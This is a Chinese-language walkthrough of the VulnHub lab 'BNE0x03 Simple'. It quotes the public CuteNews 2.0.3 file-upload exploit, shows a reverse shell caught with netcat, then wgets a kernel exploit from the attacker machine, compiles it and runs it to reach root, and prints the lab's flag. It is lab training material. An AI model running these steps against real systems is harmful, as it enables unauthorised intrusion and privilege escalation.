BNE0x03Simple靶机

BNE0x03Simple 靶机

CuteCMS2.0.3公开漏洞利用,超贴心的利用文件,将标准化的挖洞和渗透过程,几乎以手把手的方式教给你。内核提权本次靶机演示遇到了很多问题,小小的翻车现场,也是真实渗透内核提权过程的展现,面对现实,汲取教训。很容易的一台机器,但也很有思考的价值。

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.104
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 22:32 EDT
Nmap scan report for 192.168.56.104
Host is up (0.000093s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:72:6C:8B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.83 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p80 192.168.56.104 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 22:34 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 08:00:27:72:6C:8B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p80 192.168.56.104  
Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-26 22:42 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00031s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum: 
|_  /rss.php: RSS or Atom feed
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.104
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.104:80/
|     Form id: login_form
|     Form action: /index.php
|     
|     Path: http://192.168.56.104:80/?register
|     Form id: regpassword
|     Form action: /index.php?register
|     
|     Path: http://192.168.56.104:80/?register&lostpass
|     Form id: 
|     Form action: /index.php
|     
|     Path: http://192.168.56.104:80/index.php
|     Form id: login_form
|     Form action: /index.php
|     
|     Path: http://192.168.56.104:80/index.php?register
|     Form id: regpassword
|_    Form action: /index.php?register
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:72:6C:8B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 321.44 seconds

Web 界面查看

发现是一个登录界面,包含了版本号和产品名,尝试使用 searchsploit 来搜索漏洞

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ searchsploit CuteNews 2.0                             
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.0.3 - Arbitrary File Upload                                                                                                                                                                    | php/webapps/37474.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

下载文件到本地,查看内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 37474
  Exploit: CuteNews 2.0.3 - Arbitrary File Upload
      URL: https://www.exploit-db.com/exploits/37474
     Path: /usr/share/exploitdb/exploits/php/webapps/37474.txt
File Type: ASCII text

Copied to: /home/kali/37474.txt



┌──(kali㉿kali)-[~]
└─$ cat 37474.txt 
          CuteNews 2.0.3 Remote File Upload Vulnerability
        =================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I\'m T0x!c member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de  , Ghosty , Ked ans , Caddy-dz .....
==========================================================
 # Exploit  :

Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal

 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php

-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php

 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php

CuteCMS2.0.3 文件上传漏洞

得到了非常详细的利用过程,我们按照提示来上传文件,我们使用 burpsuite 来实现对上传文件内容的修改

200 上传成功,我们进入 uploads 目录试试

看来上传成功了,而且和漏洞文件里的提示是一致的,接下来我们开启监听,然后访问此 php 文件,反弹 shell 成功

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 443                                     
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.104] 46398
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
 22:51:10 up 20 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$

提权

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@simple:/$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
www-data@simple:/$ whoami
whoami
www-data
www-data@simple:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
sudo: 3 incorrect password attempts

没收获,不过内核版本号和操作系统的信息拿到了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
www-data@simple:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
bull:x:1000:1000:bull,,,:/home/bull:/bin/bash
www-data@simple:/$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied

shadow 中没有权限,试一试 home 目录中的用户的历史文件,也没有收获。试试 s 权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
www-data@simple:/usr/share/mysql$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
278515  316 -rwsr-xr--   1 root     dip        323000 Nov 25  2014 /usr/sbin/pppd
278836   20 -rwsr-sr-x   1 libuuid  libuuid     17996 Feb 12  2015 /usr/sbin/uuidd
280600   12 -rwsr-xr-x   1 root     root         9804 Feb 11  2014 /usr/lib/policykit-1/polkit-agent-helper-1
263326   12 -rwsr-xr-x   1 root     root         9612 Dec  4  2014 /usr/lib/pt_chown
278398  484 -rwsr-xr-x   1 root     root       492972 May 12  2014 /usr/lib/openssh/ssh-keysign
262362    8 -rwsr-xr-x   1 root     root         5480 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
276259  328 -rwsr-xr--   1 root     messagebus   333952 Nov 25  2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
262155   32 -rwsr-xr-x   1 root     root        30984 Feb 16  2014 /usr/bin/newgrp
262012   44 -rwsr-xr-x   1 root     root        44620 Feb 16  2014 /usr/bin/chfn
262015   36 -rwsr-xr-x   1 root     root        35916 Feb 16  2014 /usr/bin/chsh
262273  156 -rwsr-xr-x   1 root     root       156708 Feb 10  2014 /usr/bin/sudo
280595   20 -rwsr-xr-x   1 root     root        18168 Feb 11  2014 /usr/bin/pkexec
262086   68 -rwsr-xr-x   1 root     root        66252 Feb 16  2014 /usr/bin/gpasswd
278261   20 -rwsr-xr-x   1 root     root        18136 May  7  2014 /usr/bin/traceroute6.iputils
278345   72 -rwsr-xr-x   1 root     root        72860 Oct 21  2013 /usr/bin/mtr
279461   48 -rwsr-sr-x   1 daemon   daemon      46652 Oct 21  2013 /usr/bin/at
262167   48 -rwsr-xr-x   1 root     root        45420 Feb 16  2014 /usr/bin/passwd
277224   32 -rwsr-xr-x   1 root     root        30112 Dec 16  2013 /bin/fusermount
261725   36 -rwsr-xr-x   1 root     root        35300 Feb 16  2014 /bin/su
261706   44 -rwsr-xr-x   1 root     root        43316 May  7  2014 /bin/ping6
261705   40 -rwsr-xr-x   1 root     root        38932 May  7  2014 /bin/ping
261692   88 -rwsr-xr-x   1 root     root        88752 Feb 12  2015 /bin/mount
261733   68 -rwsr-xr-x   1 root     root        67704 Feb 12  2015 /bin/umount

依旧没收获,考虑内核提权

本机 python 开启 http 服务,然后在 shell 中下载

1
2
3
4
5
6
7
8
9
10
11
12
www-data@simple:/tmp$ wget http://192.168.56.106:8088/37292.c
wget http://192.168.56.106:8088/37292.c
--2023-05-26 23:02:01--  http://192.168.56.106:8088/37292.c
Connecting to 192.168.56.106:8088... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4968 (4.9K) [text/x-csrc]
Saving to: '37292.c'

100%[======================================>] 4,968       --.-K/s   in 0s      

2023-05-26 23:02:01 (1.06 GB/s) - '37292.c' saved [4968/4968]

尝试成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
www-data@simple:/tmp$ mv 37292.c ofs.c
mv 37292.c ofs.c
www-data@simple:/tmp$ gcc ofs.c -o ofs
gcc ofs.c -o ofs
www-data@simple:/tmp$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -liah
ls -liah
total 20K
261842 drwx------  2 root root 4.0K Sep 21  2015 .
     2 drwxr-xr-x 21 root root 4.0K Sep  9  2015 ..
261843 -rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
261844 -rw-r--r--  1 root root  140 Feb 19  2014 .profile
261852 -rw-------  1 root root   52 Sep 21  2015 flag.txt
# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
knowledge_database > vulnhub
BNE0x03Simple靶机
https://i3eg1nner.github.io/2023/05/877acee13580.html
作者
I3eg1nner
发布于
2023年5月27日
许可协议